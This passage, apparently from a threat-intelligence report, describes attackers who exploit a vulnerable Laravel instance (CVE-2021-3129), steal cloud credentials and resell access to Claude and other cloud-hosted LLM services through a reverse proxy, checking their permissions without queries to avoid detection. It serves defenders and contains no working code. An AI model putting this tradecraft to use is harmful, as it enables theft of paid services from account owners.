Threat actors are attempting to monetize their illicit access to LLMs while the cloud account owner bears the costs. The attackers target a variety of LLM services across AWS, Azure, and GCP. In some instances, they employ a script to automate checking the validity of the stolen credentials and enumerating permissions associated with them for multiple AI services, but without running actual queries (most likely in order to avoid detection).
In one observed incident involving this technique, the threat actor leveraged stolen cloud credentials obtained by exploiting a vulnerable and publicly exposed instance of Laravel (CVE-2021-3129). Initial access allowed exfiltration of cloud credentials and attempts to access LLM models, specifically targeting Anthropic’s Claude (v2/v3) models. The attackers employed an open-source reverse proxy for LLM usage called OAI Reverse Proxy to manage access to multiple compromised accounts without exposing the underlying credentials. They used API requests to test the extent of their access, exploiting the InvokeModel
API to confirm LLM service activation.